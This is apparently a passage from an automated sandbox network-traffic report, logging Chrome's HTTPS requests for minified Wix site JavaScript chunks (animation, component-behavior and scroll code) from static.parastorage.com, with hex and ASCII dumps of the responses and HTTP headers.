                                                                                                                                                                                                                        2025-01-10 13:53:12 UTC1390INData Raw: 75 3d 6e 28 39 31 36 37 34 29 3b 63 6f 6e 73 74 20 6d 3d 65 3d 3e 28 7b 63 6f 6d 70 49 64 3a 65 2e 63 6f 6d 70 49 64 2c 64 61 74 61 49 64 3a 65 2e 64 61 74 61 49 64 7d 29 2c 49 3d 28 65 2c 74 2c 6e 2c 6f 2c 72 2c 63 2c 61 2c 73 2c 64 3d 21 31 29 3d 3e 7b 63 6f 6e 73 74 20 6c 3d 28 30 2c 75 2e 6b 6d 29 28 22 53 49 54 45 5f 48 45 41 44 45 52 22 2c 6f 2c 73 29 2c 69 3d 6c 3f 2e 67 65 74 42 6f 75 6e 64 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 28 29 2e 68 65 69 67 68 74 3b 6c 65 74 20 49 2c 76 3d 69 7c 7c 61 3b 63 6f 6e 73 74 20 62 3d 28 29 3d 3e 7b 63 6f 6e 73 74 20 65 3d 6f 2e 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 68 2e 4d 34 29 3b 65 26 26 28 76 2b 3d 65 2e 6f 66 66 73 65 74 48 65 69 67 68 74 29 2c 49 3d 6e 2e 72 65 64 75 63
                                                                                                                                                                                                                        Data Ascii: u=n(91674);const m=e=>({compId:e.compId,dataId:e.dataId}),I=(e,t,n,o,r,c,a,s,d=!1)=>{const l=(0,u.km)("SITE_HEADER",o,s),i=l?.getBoundingClientRect().height;let I,v=i||a;const b=()=>{const e=o.document.getElementById(h.M4);e&&(v+=e.offsetHeight),I=n.reduc
                                                                                                                                                                                                                        2025-01-10 13:53:12 UTC885INData Raw: 2c 66 28 65 29 7d 29 29 7d 2c 41 3d 28 30 2c 67 2e 64 65 62 6f 75 6e 63 65 29 28 77 2e 62 69 6e 64 28 6e 75 6c 6c 2c 64 29 2c 68 2e 63 67 29 2c 4f 3d 28 30 2c 67 2e 64 65 62 6f 75 6e 63 65 29 28 77 2e 62 69 6e 64 28 6e 75 6c 6c 2c 21 30 29 2c 68 2e 62 53 29 3b 72 65 74 75 72 6e 28 29 3d 3e 28 70 28 29 2e 6d 65 61 73 75 72 65 28 28 28 29 3d 3e 7b 62 28 29 2c 66 28 21 30 29 7d 29 29 2c 6f 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 73 63 72 6f 6c 6c 22 2c 41 29 2c 6f 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 72 65 73 69 7a 65 22 2c 4f 29 2c 28 29 3d 3e 7b 6f 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 73 63 72 6f 6c 6c 22 2c 41 29 2c 6f 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 72 65
                                                                                                                                                                                                                        Data Ascii: ,f(e)}))},A=(0,g.debounce)(w.bind(null,d),h.cg),O=(0,g.debounce)(w.bind(null,!0),h.bS);return()=>(p().measure((()=>{b(),f(!0)})),o.addEventListener("scroll",A),o.addEventListener("resize",O),()=>{o.removeEventListener("scroll",A),o.removeEventListener("re


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        121192.168.2.55007334.49.229.814435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:12 UTC404OUTGET /services/wix-thunderbolt/dist/motion.d05a604c.chunk.min.js HTTP/1.1
                                                                                                                                                                                                                        Host: static.parastorage.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:53:12 UTC1161INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Length: 95126
                                                                                                                                                                                                                        X-Amz-Replication-Status: COMPLETED
                                                                                                                                                                                                                        X-Amz-Server-Side-Encryption: AES256
                                                                                                                                                                                                                        X-Amz-Version-Id: _yWyWgpXiGKzERpMCnpyjL2udgHlqJRL
                                                                                                                                                                                                                        Server: Pepyaka/1.21.6
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-*
                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        X-Varnish: 101606580 14195517
                                                                                                                                                                                                                        Via: 1.1 varnish (Varnish/6.0),1.1 varnish (Varnish/6.0), 1.1 google
                                                                                                                                                                                                                        X-Cluster-Self-Is-Next: false
                                                                                                                                                                                                                        X-Varnish: 955474791
                                                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                                                        X-Seen-By: aVxMblM8KFG3we5NLvyVc75LqHKURxvujjeddHLBCHZn+PxHDBkh4V2x50EyEnEQ
                                                                                                                                                                                                                        X-Cluster-Node-Role: proxy
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Date: Fri, 10 Jan 2025 06:45:17 GMT
                                                                                                                                                                                                                        Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                                                        Age: 25675
                                                                                                                                                                                                                        Last-Modified: Fri, 10 Jan 2025 05:59:16 GMT
                                                                                                                                                                                                                        ETag: "09c587f361bed7d0c70e8dce1f76f0e7"
                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        x-cache: hit
                                                                                                                                                                                                                        glb-x-seen-by: qhk2IXhXaFW+ScoHjRxEUvX1Zxk6j9wOS6tQMkUbOP0=
                                                                                                                                                                                                                        x-gcp-cdn-pop: LGA-991dec68
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2025-01-10 13:53:12 UTC229INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 33 39 30 39 5d 2c 7b 36 38 37 34 37 3a 28 74 2c 65 2c 61 29 3d 3e 7b 61 2e 72 28 65 29 2c 61 2e 64 28 65 2c 7b 41 6e 69 6d 61 74 69 6f 6e 4d 61 6e 61 67 65 72 3a 28 29 3d 3e 4d 2c 4d 6f 74 69 6f 6e 53 79 6d 62 6f 6c 3a 28 29 3d 3e 54 2e 68 2c 61 6e 69 6d 61 74 69 6f 6e 41 70 69 46 61 63 74 6f 72 79 3a 28 29 3d 3e 5f 72 2c 70 61 67 65 3a 28 29 3d 3e 44 72 7d 29 3b 76 61 72
                                                                                                                                                                                                                        Data Ascii: "use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[3909],{68747:(t,e,a)=>{a.r(e),a.d(e,{AnimationManager:()=>M,MotionSymbol:()=>T.h,animationApiFactory:()=>_r,page:()=>Dr});var
                                                                                                                                                                                                                        2025-01-10 13:53:12 UTC1390INData Raw: 20 6e 3d 7b 7d 3b 61 2e 72 28 6e 29 2c 61 2e 64 28 6e 2c 7b 69 6e 69 74 69 61 6c 46 72 61 6d 65 3a 28 29 3d 3e 73 65 2c 70 72 65 70 61 72 65 3a 28 29 3d 3e 75 65 2c 73 74 79 6c 65 3a 28 29 3d 3e 6d 65 2c 77 65 62 3a 28 29 3d 3e 66 65 7d 29 3b 76 61 72 20 72 3d 7b 7d 3b 61 2e 72 28 72 29 2c 61 2e 64 28 72 2c 7b 69 6e 69 74 69 61 6c 46 72 61 6d 65 3a 28 29 3d 3e 73 65 2c 73 74 79 6c 65 3a 28 29 3d 3e 67 65 2c 77 65 62 3a 28 29 3d 3e 70 65 7d 29 3b 76 61 72 20 6f 3d 7b 7d 3b 61 2e 72 28 6f 29 2c 61 2e 64 28 6f 2c 7b 69 6e 69 74 69 61 6c 46 72 61 6d 65 3a 28 29 3d 3e 73 65 2c 73 74 79 6c 65 3a 28 29 3d 3e 79 65 2c 77 65 62 3a 28 29 3d 3e 68 65 7d 29 3b 76 61 72 20 69 3d 7b 7d 3b 61 2e 72 28 69 29 2c 61 2e 64 28 69 2c 7b 69 6e 69 74 69 61 6c 46 72 61 6d 65 3a
                                                                                                                                                                                                                        Data Ascii: n={};a.r(n),a.d(n,{initialFrame:()=>se,prepare:()=>ue,style:()=>me,web:()=>fe});var r={};a.r(r),a.d(r,{initialFrame:()=>se,style:()=>ge,web:()=>pe});var o={};a.r(o),a.d(o,{initialFrame:()=>se,style:()=>ye,web:()=>he});var i={};a.r(i),a.d(i,{initialFrame:
                                                                                                                                                                                                                        2025-01-10 13:53:12 UTC1390INData Raw: 61 72 20 62 3d 7b 7d 3b 61 2e 72 28 62 29 2c 61 2e 64 28 62 2c 7b 69 6e 69 74 69 61 6c 46 72 61 6d 65 3a 28 29 3d 3e 73 65 2c 70 72 65 70 61 72 65 3a 28 29 3d 3e 5f 61 2c 73 74 79 6c 65 3a 28 29 3d 3e 41 61 2c 77 65 62 3a 28 29 3d 3e 54 61 7d 29 3b 76 61 72 20 77 3d 7b 7d 3b 61 2e 72 28 77 29 2c 61 2e 64 28 77 2c 7b 69 6e 69 74 69 61 6c 46 72 61 6d 65 3a 28 29 3d 3e 73 65 2c 73 74 79 6c 65 3a 28 29 3d 3e 46 61 2c 77 65 62 3a 28 29 3d 3e 42 61 7d 29 3b 76 61 72 20 6b 3d 7b 7d 3b 61 2e 72 28 6b 29 2c 61 2e 64 28 6b 2c 7b 69 6e 69 74 69 61 6c 46 72 61 6d 65 3a 28 29 3d 3e 73 65 2c 70 72 65 70 61 72 65 3a 28 29 3d 3e 71 61 2c 73 74 79 6c 65 3a 28 29 3d 3e 44 61 2c 77 65 62 3a 28 29 3d 3e 43 61 7d 29 3b 76 61 72 20 4f 3d 7b 7d 3b 61 2e 72 28 4f 29 2c 61 2e 64
                                                                                                                                                                                                                        Data Ascii: ar b={};a.r(b),a.d(b,{initialFrame:()=>se,prepare:()=>_a,style:()=>Aa,web:()=>Ta});var w={};a.r(w),a.d(w,{initialFrame:()=>se,style:()=>Fa,web:()=>Ba});var k={};a.r(k),a.d(k,{initialFrame:()=>se,prepare:()=>qa,style:()=>Da,web:()=>Ca});var O={};a.r(O),a.d
                                                                                                                                                                                                                        2025-01-10 13:53:12 UTC1390INData Raw: 72 69 67 67 65 72 73 2c 74 2e 73 63 72 75 62 29 2c 74 68 69 73 2e 5f 75 70 64 61 74 65 53 63 72 75 62 4d 61 6e 61 67 65 72 73 28 74 2e 73 63 72 75 62 29 29 29 3b 63 6f 6e 73 74 20 61 3d 74 68 69 73 2e 69 73 52 65 73 70 6f 6e 73 69 76 65 3f 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3a 30 3b 74 2e 70 6c 61 79 3f 2e 6c 65 6e 67 74 68 26 26 74 2e 70 6c 61 79 2e 66 6f 72 45 61 63 68 28 28 28 7b 65 66 66 65 63 74 49 64 3a 74 2c 74 61 72 67 65 74 49 64 3a 65 2c 74 6f 67 67 6c 65 3a 6e 7d 29 3d 3e 7b 63 6f 6e 73 74 20 72 3d 74 68 69 73 2e 5f 67 65 74 45 66 66 65 63 74 56 61 72 69 61 74 69 6f 6e 46 6f 72 43 75 72 72 65 6e 74 42 72 65 61 6b 70 6f 69 6e 74 28 74 2c 61 29 3b 28 72 3f 2e 6e 61 6d 65 64 45 66 66 65 63 74 7c 7c 72 3f 2e 63 75 73 74 6f 6d 45 66
                                                                                                                                                                                                                        Data Ascii: riggers,t.scrub),this._updateScrubManagers(t.scrub)));const a=this.isResponsive?window.innerWidth:0;t.play?.length&&t.play.forEach((({effectId:t,targetId:e,toggle:n})=>{const r=this._getEffectVariationForCurrentBreakpoint(t,a);(r?.namedEffect||r?.customEf
                                                                                                                                                                                                                        2025-01-10 13:53:12 UTC1390INData Raw: 26 28 74 68 69 73 2e 73 63 72 75 62 4d 61 6e 61 67 65 72 73 2e 66 6f 72 45 61 63 68 28 28 74 3d 3e 74 2e 64 65 73 74 72 6f 79 28 29 29 29 2c 74 68 69 73 2e 73 63 72 75 62 4d 61 6e 61 67 65 72 73 2e 6c 65 6e 67 74 68 3d 30 29 3b 63 6f 6e 73 74 20 61 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 74 29 2c 6e 3d 74 68 69 73 2e 69 73 52 65 73 70 6f 6e 73 69 76 65 3f 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3a 30 2c 72 3d 7b 7d 3b 66 6f 72 28 63 6f 6e 73 74 20 74 20 6f 66 20 61 29 7b 63 6f 6e 73 74 20 65 3d 74 68 69 73 2e 5f 67 65 74 45 66 66 65 63 74 56 61 72 69 61 74 69 6f 6e 46 6f 72 43 75 72 72 65 6e 74 42 72 65 61 6b 70 6f 69 6e 74 28 74 2c 6e 29 3b 22 53 63 72 75 62 41 6e 69 6d 61 74 69 6f 6e 4f 70 74 69 6f 6e 73 22 3d 3d 3d 65 3f 2e 74 79 70 65 26 26
                                                                                                                                                                                                                        Data Ascii: &(this.scrubManagers.forEach((t=>t.destroy())),this.scrubManagers.length=0);const a=Object.keys(t),n=this.isResponsive?window.innerWidth:0,r={};for(const t of a){const e=this._getEffectVariationForCurrentBreakpoint(t,n);"ScrubAnimationOptions"===e?.type&&
                                                                                                                                                                                                                        2025-01-10 13:53:12 UTC1390INData Raw: 61 63 6b 73 28 65 2c 72 2c 6e 29 3b 6f 3f 6f 2e 70 6c 61 79 28 29 3a 74 68 69 73 2e 61 70 69 2e 70 6c 61 79 28 72 2c 6e 2c 69 29 7d 5f 70 61 75 73 65 41 6e 69 6d 61 74 69 6f 6e 28 74 2c 65 29 7b 63 6f 6e 73 74 20 61 3d 74 68 69 73 2e 61 70 69 2e 67 65 74 54 61 72 67 65 74 41 6e 69 6d 61 74 69 6f 6e 28 74 2c 65 29 3b 61 3f 2e 70 61 75 73 65 28 29 7d 5f 73 65 74 41 6e 69 6d 61 74 69 6f 6e 50 6c 61 79 73 74 61 74 65 54 72 69 67 67 65 72 28 74 2c 65 29 7b 63 6f 6e 73 74 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 61 26 26 74 68 69 73 2e 76 69 65 77 70 6f 72 74 4d 61 6e 61 67 65 72 29 7b 63 6f 6e 73 74 20 6e 3d 61 2e 63 6c 6f 73 65 73 74 28 22 5b 64 61 74 61 2d 62 6c 6f 63 6b 2d 6c 65 76 65 6c 2d 63 6f 6e
                                                                                                                                                                                                                        Data Ascii: acks(e,r,n);o?o.play():this.api.play(r,n,i)}_pauseAnimation(t,e){const a=this.api.getTargetAnimation(t,e);a?.pause()}_setAnimationPlaystateTrigger(t,e){const a=document.getElementById(e);if(a&&this.viewportManager){const n=a.closest("[data-block-level-con
                                                                                                                                                                                                                        2025-01-10 13:53:12 UTC1390INData Raw: 22 72 6f 74 61 74 65 58 22 2c 68 6f 72 69 7a 6f 6e 74 61 6c 3a 22 72 6f 74 61 74 65 59 22 7d 3b 63 6f 6e 73 74 20 71 3d 34 30 2c 47 3d 7b 73 6f 66 74 3a 7b 73 63 61 6c 65 46 72 6f 6d 3a 2e 38 2c 73 63 61 6c 65 54 6f 3a 31 2e 32 2c 74 72 61 76 65 6c 59 3a 30 7d 2c 6d 65 64 69 75 6d 3a 7b 73 63 61 6c 65 46 72 6f 6d 3a 2e 33 2c 73 63 61 6c 65 54 6f 3a 31 2e 37 2c 74 72 61 76 65 6c 59 3a 2e 37 35 7d 2c 68 61 72 64 3a 7b 73 63 61 6c 65 46 72 6f 6d 3a 30 2c 73 63 61 6c 65 54 6f 3a 34 2c 74 72 61 76 65 6c 59 3a 31 7d 7d 2c 57 3d 7b 74 6f 70 3a 5b 30 2c 2d 35 30 5d 2c 22 74 6f 70 2d 72 69 67 68 74 22 3a 5b 35 30 2c 2d 35 30 5d 2c 72 69 67 68 74 3a 5b 35 30 2c 30 5d 2c 22 62 6f 74 74 6f 6d 2d 72 69 67 68 74 22 3a 5b 35 30 2c 35 30 5d 2c 62 6f 74 74 6f 6d 3a 5b 30
                                                                                                                                                                                                                        Data Ascii: "rotateX",horizontal:"rotateY"};const q=40,G={soft:{scaleFrom:.8,scaleTo:1.2,travelY:0},medium:{scaleFrom:.3,scaleTo:1.7,travelY:.75},hard:{scaleFrom:0,scaleTo:4,travelY:1}},W={top:[0,-50],"top-right":[50,-50],right:[50,0],"bottom-right":[50,50],bottom:[0
                                                                                                                                                                                                                        2025-01-10 13:53:12 UTC1390INData Raw: 7d 25 2c 20 24 7b 72 7d 25 20 24 7b 61 2d 6f 2f 32 7d 25 2c 20 24 7b 6e 7d 25 20 24 7b 61 2d 6f 2f 32 7d 25 60 7d 2c 68 6f 72 69 7a 6f 6e 74 61 6c 3a 74 3d 3e 7b 6c 65 74 7b 74 6f 70 3a 65 2c 62 6f 74 74 6f 6d 3a 61 2c 6c 65 66 74 3a 6e 2c 72 69 67 68 74 3a 72 2c 6d 69 6e 69 6d 75 6d 3a 6f 7d 3d 74 3b 72 65 74 75 72 6e 60 24 7b 6e 2b 6f 2f 32 7d 25 20 24 7b 65 7d 25 2c 20 24 7b 72 2d 6f 2f 32 7d 25 20 24 7b 65 7d 25 2c 20 24 7b 72 2d 6f 2f 32 7d 25 20 24 7b 61 7d 25 2c 20 24 7b 6e 2b 6f 2f 32 7d 25 20 24 7b 61 7d 25 60 7d 7d 3b 66 75 6e 63 74 69 6f 6e 20 4a 28 74 29 7b 6c 65 74 7b 64 69 72 65 63 74 69 6f 6e 3a 65 2c 73 63 61 6c 65 58 3a 61 3d 31 2c 73 63 61 6c 65 59 3a 6e 3d 31 2c 6d 69 6e 69 6d 75 6d 3a 72 3d 30 7d 3d 74 3b 63 6f 6e 73 74 20 6f 3d 28 31
                                                                                                                                                                                                                        Data Ascii: }%, ${r}% ${a-o/2}%, ${n}% ${a-o/2}%`},horizontal:t=>{let{top:e,bottom:a,left:n,right:r,minimum:o}=t;return`${n+o/2}% ${e}%, ${r-o/2}% ${e}%, ${r-o/2}% ${a}%, ${n+o/2}% ${a}%`}};function J(t){let{direction:e,scaleX:a=1,scaleY:n=1,minimum:r=0}=t;const o=(1
                                                                                                                                                                                                                        2025-01-10 13:53:12 UTC1390INData Raw: 35 34 2c 20 31 2c 20 30 2e 38 39 30 37 2c 20 30 2e 38 31 32 35 20 34 35 2e 34 35 25 2c 20 30 2e 37 38 35 32 2c 20 30 2e 37 36 35 37 2c 20 30 2e 37 35 33 39 2c 20 30 2e 37 35 2c 20 30 2e 37 35 33 39 2c 20 30 2e 37 36 35 37 2c 20 30 2e 37 38 35 32 2c 20 30 2e 38 31 32 35 20 36 33 2e 36 34 25 2c 20 30 2e 38 39 30 35 2c 20 31 20 37 32 2e 37 33 25 2c 20 30 2e 39 37 32 37 2c 20 30 2e 39 35 33 32 2c 20 30 2e 39 34 31 34 2c 20 30 2e 39 33 37 35 2c 20 30 2e 39 34 31 34 2c 20 30 2e 39 35 33 31 2c 20 30 2e 39 37 32 36 2c 20 31 2c 20 30 2e 39 38 38 33 2c 20 30 2e 39 38 34 34 2c 20 30 2e 39 38 38 33 2c 20 31 20 29 22 7d 3b 66 75 6e 63 74 69 6f 6e 20 6e 74 28 74 29 7b 72 65 74 75 72 6e 20 74 26 26 61 74 5b 74 5d 7c 7c 22 6c 69 6e 65 61 72 22 7d 66 75 6e 63 74 69 6f 6e
                                                                                                                                                                                                                        Data Ascii: 54, 1, 0.8907, 0.8125 45.45%, 0.7852, 0.7657, 0.7539, 0.75, 0.7539, 0.7657, 0.7852, 0.8125 63.64%, 0.8905, 1 72.73%, 0.9727, 0.9532, 0.9414, 0.9375, 0.9414, 0.9531, 0.9726, 1, 0.9883, 0.9844, 0.9883, 1 )"};function nt(t){return t&&at[t]||"linear"}function
                                                                                                                                                                                                                        2025-01-10 13:53:12 UTC1390INData Raw: 74 3a 7b 73 74 61 72 74 58 3a 22 63 61 6c 63 28 76 61 72 28 2d 2d 6d 6f 74 69 6f 6e 2d 6c 65 66 74 2c 20 63 61 6c 63 28 31 30 30 76 77 20 2d 20 31 30 30 25 29 29 20 2a 20 2d 31 20 2d 20 31 30 30 25 29 22 2c 65 6e 64 58 3a 22 63 61 6c 63 28 31 30 30 76 77 20 2d 20 76 61 72 28 2d 2d 6d 6f 74 69 6f 6e 2d 6c 65 66 74 2c 20 30 70 78 29 29 22 7d 2c 72 69 67 68 74 3a 7b 73 74 61 72 74 58 3a 22 63 61 6c 63 28 31 30 30 76 77 20 2d 20 76 61 72 28 2d 2d 6d 6f 74 69 6f 6e 2d 6c 65 66 74 2c 20 30 70 78 29 29 22 2c 65 6e 64 58 3a 22 63 61 6c 63 28 76 61 72 28 2d 2d 6d 6f 74 69 6f 6e 2d 6c 65 66 74 2c 20 63 61 6c 63 28 31 30 30 76 77 20 2d 20 31 30 30 25 29 29 20 2a 20 2d 31 20 2d 20 31 30 30 25 29 22 7d 7d 3b 63 6f 6e 73 74 20 75 74 3d 2e 35 3b 66 75 6e 63 74 69 6f 6e
                                                                                                                                                                                                                        Data Ascii: t:{startX:"calc(var(--motion-left, calc(100vw - 100%)) * -1 - 100%)",endX:"calc(100vw - var(--motion-left, 0px))"},right:{startX:"calc(100vw - var(--motion-left, 0px))",endX:"calc(var(--motion-left, calc(100vw - 100%)) * -1 - 100%)"}};const ut=.5;function


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        122192.168.2.55007434.49.229.814435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:12 UTC406OUTGET /services/wix-thunderbolt/dist/group_36.dabdc384.chunk.min.js HTTP/1.1
                                                                                                                                                                                                                        Host: static.parastorage.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:53:12 UTC1192INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Length: 805
                                                                                                                                                                                                                        X-Amz-Replication-Status: COMPLETED
                                                                                                                                                                                                                        X-Amz-Server-Side-Encryption: AES256
                                                                                                                                                                                                                        X-Amz-Version-Id: _9pymu5N8axkcuVX.9sb5jQH0j.wK2dU
                                                                                                                                                                                                                        Server: Pepyaka/1.21.6
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-*
                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        X-Cluster-Self-Is-Next: true
                                                                                                                                                                                                                        X-Varnish: 968831394
                                                                                                                                                                                                                        X-Cache-Status: MISS
                                                                                                                                                                                                                        X-Seen-By: aVxMblM8KFG3we5NLvyVc75LqHKURxvujjeddHLBCHZn+PxHDBkh4V2x50EyEnEQ,2iuX5LYwvZa9CoGaG8ZUZh/UsIXy25E2og5JiYX0UsYJC5ihjDbfvfVz+xeJaaamQIy7SrWyFT8Nia0GQvKuYA==
                                                                                                                                                                                                                        X-Cluster-Node-Role: serve
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Via: 1.1 varnish (Varnish/6.0), 1.1 google
                                                                                                                                                                                                                        Date: Tue, 07 Jan 2025 10:07:04 GMT
                                                                                                                                                                                                                        Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                                                        Age: 272768
                                                                                                                                                                                                                        Last-Modified: Tue, 07 Jan 2025 10:03:16 GMT
                                                                                                                                                                                                                        ETag: "e65b3e16d1790e074abfd552358f79a2"
                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        x-cache: hit
                                                                                                                                                                                                                        glb-x-seen-by: qhk2IXhXaFW+ScoHjRxEUvX1Zxk6j9wOS6tQMkUbOP0=
                                                                                                                                                                                                                        x-gcp-cdn-pop: LGA-12baf686
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2025-01-10 13:53:12 UTC198INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 39 38 39 36 5d 2c 7b 39 34 31 30 39 3a 28 65 2c 73 2c 6e 29 3d 3e 7b 6e 2e 72 28 73 29 2c 6e 2e 64 28 73 2c 7b 70 61 67 65 3a 28 29 3d 3e 75 7d 29 3b 76 61 72 20 6f 3d 6e 28 36 32 31 35 35 29 2c 61 3d 6e 2e 6e 28 6f 29 2c 70 3d 6e 28 37 37 37 34 38 29 2c 74 3d 6e 28 32 30 35 39 30
                                                                                                                                                                                                                        Data Ascii: "use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[9896],{94109:(e,s,n)=>{n.r(s),n.d(s,{page:()=>u});var o=n(62155),a=n.n(o),p=n(77748),t=n(20590
                                                                                                                                                                                                                        2025-01-10 13:53:12 UTC607INData Raw: 29 2c 69 3d 6e 28 34 37 38 29 2c 6c 3d 6e 28 39 38 35 38 29 2c 64 3d 6e 28 36 39 34 33 34 29 3b 63 6f 6e 73 74 20 63 3d 28 30 2c 70 2e 4f 67 29 28 5b 28 30 2c 70 2e 4b 54 29 28 74 2e 47 70 2c 6c 2e 55 29 2c 69 2e 65 5d 2c 28 28 65 2c 73 29 3d 3e 28 7b 6e 61 6d 65 3a 22 6f 6e 6c 6f 61 64 43 6f 6d 70 73 42 65 68 61 76 69 6f 72 73 22 2c 70 61 67 65 57 69 6c 6c 4d 6f 75 6e 74 28 29 7b 63 6f 6e 73 74 7b 63 6f 6d 70 73 42 65 68 61 76 69 6f 72 73 3a 6e 7d 3d 65 2c 6f 3d 28 30 2c 64 2e 4e 29 28 7b 69 73 52 65 73 70 6f 6e 73 69 76 65 3a 21 30 7d 29 2c 70 3d 28 30 2c 64 2e 4e 29 28 7b 69 73 52 65 73 70 6f 6e 73 69 76 65 3a 21 31 7d 29 2c 74 3d 61 28 29 2e 6d 61 70 56 61 6c 75 65 73 28 6e 2c 28 28 7b 63 6f 6c 6c 61 70 73 65 4f 6e 4c 6f 61 64 3a 65 2c 68 69 64 64 65
                                                                                                                                                                                                                        Data Ascii: ),i=n(478),l=n(9858),d=n(69434);const c=(0,p.Og)([(0,p.KT)(t.Gp,l.U),i.e],((e,s)=>({name:"onloadCompsBehaviors",pageWillMount(){const{compsBehaviors:n}=e,o=(0,d.N)({isResponsive:!0}),p=(0,d.N)({isResponsive:!1}),t=a().mapValues(n,(({collapseOnLoad:e,hidde


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        123192.168.2.55007534.49.229.814435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:12 UTC633OUTGET /services/wix-thunderbolt/dist/scrollToAnchor.03bceb39.chunk.min.js HTTP/1.1
                                                                                                                                                                                                                        Host: static.parastorage.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        Origin: https://www.samantacatering.com
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
